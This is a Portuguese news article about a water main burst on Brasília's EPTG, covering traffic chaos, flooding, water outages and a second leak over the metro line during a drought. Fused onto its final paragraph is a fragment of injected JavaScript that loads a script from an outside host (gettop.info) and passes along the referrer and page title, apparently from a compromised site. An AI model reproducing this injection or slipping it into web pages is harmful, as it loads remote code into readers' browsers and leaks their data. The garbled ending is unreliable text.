Rompimento de adutora leva caos ao trânsito na saída da EPVP

Os milhares brasilienses que passaram pela Estrada Parque Taguatinga (EPTG) e pela Estrada Parque Núcleo Bandeirante (EPNB) na manhã desta quinta-feira (17) enfrentaram engarrafamentos quilométricos devido ao rompimento de uma adutora no viaduto Israel Pinheiro, na marginal da EPTG.

O trânsito no local precisou ser desviado. O Departamento de Estradas de Rodagem (DER-DF) liberou as faixas exclusivas para ônibus, para amenizar os efeitos do acidente. Por conta do mesmo incidente, o departamento também decidiu estender a reversão da via Estrutural, sentido Taguatinga, até às 20h30.

Além dos problemas no trânsito, o acidente inundou casas e carros na Vicente Pires e deixou sem água por tempo indeterminado o Guará, Águas Claras e Taguatinga. É a segunda vez que a adutora rompe na EPTG. Na outra ocasião, um funcionário da Caesb foi morto. Vale ressaltar que a água que jorrou durante mais de uma hora no asfalto é limpa e própria para consumo – em período de racionamento.

Segundo o presidente da Caesb, Maurício Luduvice, houve um “rasgo” em um dos canos de ferro fundido que tem um metro de diâmetro. Ele informa, ainda, que será preciso trocar duas barras do tubo. A força da água foi tanta que blocos de concreto foram arremessados para o meio da pista.

Vazamento no Pistão Sul – Poucos momentos depois do incidente na EPTG, imagens aéreas da Rede Globo mostraram outro ponto de vazamento de água na rede da Caesb, em uma ventosa na altura do Pistão Sul, em Taguatinga. O ponto de escape da água, que fica sobre a linha da Companhia do Metropolitano do Distrito Federal (Metrô-DF), fazia jorrar grande quantidade de água sobre os trilhos. A assessoria de imprensa do Metrô, no entanto, informou que os trens funcionam normalmente.

Os rompimentos em tubulações da Caesb ocorrem em um momento delicado da crise hídrica no Distrito Federal. A população já enfrenta 87 dias sem chuvas e há cerca de oito meses em racionamento no abastecimento de água. A Caesb ainda não se pronunciou sobre os impactos do problema de hoje e nem quando o serviço será normalizado.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário